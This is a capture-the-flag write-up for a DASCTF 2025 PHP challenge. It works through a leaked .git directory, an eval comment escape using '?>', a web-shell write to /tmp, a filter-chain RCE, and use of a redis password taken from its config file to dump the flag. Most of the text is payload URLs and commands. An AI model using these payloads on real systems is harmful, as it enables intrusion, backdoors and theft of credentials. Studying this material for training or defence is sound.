
2025DASCTFwp

DASCTF2025wp

phpms

The site leaks its .git directory. After recovering it with GitHacker, use git log to restore the historical versions.

This yields index.php:

<?php
$shell = $_GET['shell'];
if(preg_match('/\x0a|\x0d/',$shell)){
    echo ':(';
}else{
    eval("#$shell");
}
?>

The payload is then passed through the shell parameter. All PHP functions are disabled inside eval, and the leading # (which turns the injected line into a comment) is bypassed with a ?><? sequence, since ?> also terminates a single-line comment.

Use a native PHP class to list the directory:
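Why the CR/LF filter alone does not neutralise the comment, as an added illustration that is not part of the original writeup: in PHP a # or // comment ends at the line break or at the closing tag ?>, whichever comes first, so the challenge's check leaves the closing tag as an escape route. The function and sample names below are my own.

```php
<?php
// Added defensive illustration, not code from the original writeup.
// Challenge pattern: only CR/LF are rejected before eval("#$shell"),
// but a single-line comment (# or //) also ends at the PHP closing tag ?>.
function challenge_filter_allows(string $shell): bool {
    return !preg_match('/\x0a|\x0d/', $shell);   // true = "allowed"
}

// Stricter check: any of CR, LF or the closing tag can end a '#' comment,
// so all three must be treated as comment terminators.
function comment_can_be_escaped(string $shell): bool {
    return (bool) preg_match('/\x0a|\x0d|\?>/', $shell);
}

// Constructed samples: the closing-tag prefix used in the writeup and a
// value that genuinely stays inside the comment.
$samples = [
    "?><?php echo 1;?>",
    "just a comment",
];
foreach ($samples as $s) {
    printf("%-22s challenge filter allows: %-3s  escapes comment: %s\n",
        json_encode($s),
        challenge_filter_allows($s) ? 'yes' : 'no',
        comment_can_be_escaped($s) ? 'yes' : 'no');
}
// The actual fix is to never interpolate request data into eval(): there is
// no reliable blacklist for a string that will be compiled as PHP.
```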

index.php?shell=?><?php $d=new GlobIterator('/*');foreach($d as $f){echo $f->getPathname().'<br>';}?>

There is a hintflag file in the root directory.

The web directory also contains no_careee.php.

Here the SplFileObject native class is used to read files, but the permissions are insufficient for hintflag:

?shell=?><?php $f=new SplFileObject('/etc/passwd');echo $f->fread($f->getSize());?>

Read no_careee.php directly:

<?php
function block_if_dangerous_code($input) {
    // Regex: match the function names, case-insensitively, and capture the actual match
    if (preg_match('/\b(eval|include|include_once|require|require_once)\b/i', $input, $match)) {
        $matched_func = $match[1];  // the captured function name
        echo "<br />";
        echo "<b>Warning</b>: {$matched_func} has been disabled for security reasons in <b>/var/www/html/index.php(6) : eval()'d code</b> on line <b>1</b><br />";
        exit;
    }
}

// Check the GET parameter shell
if (isset($_GET['shell'])) {
    block_if_dangerous_code($_GET['shell']);
}

?>

So all functions are indeed disabled.

Files can still be written with fwrite:

?shell=?><?php $f=new SplFileObject('/tmp/shell.php','w');$f->fwrite('<?php system($_GET["cmd"]); ?>');?>

Read /proc/self/maps and libc-2.31.so, then go for the filter-chain RCE:

maps_path = './maps'
cmd = "echo '<?php eval($_POST[1]);'>/var/www/html/1.php"

The current directory is not writable, so write to the tmp directory instead.

Change cmd to ps -ef to view the processes.

root is running a redis service, so read /etc/redis.conf for the password:

################################## SECURITY ###################################

# Require clients to issue AUTH <PASSWORD> before processing any other
# commands.  This might be useful in environments in which you do not trust
# others with access to the host running redis-server.
#
# This should stay commented out for backward compatibility and because most
# people do not need auth (e.g. they run their own servers).
#
# Warning: since Redis is pretty fast an outside user can try up to
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
#
requirepass admin123

Construct redis commands to read the database:

redis-cli -a admin123 KEYS "*" > /tmp/5.txt
redis-cli -a admin123 GET "flag" > /tmp/5.txt
Licensed under 9u_l3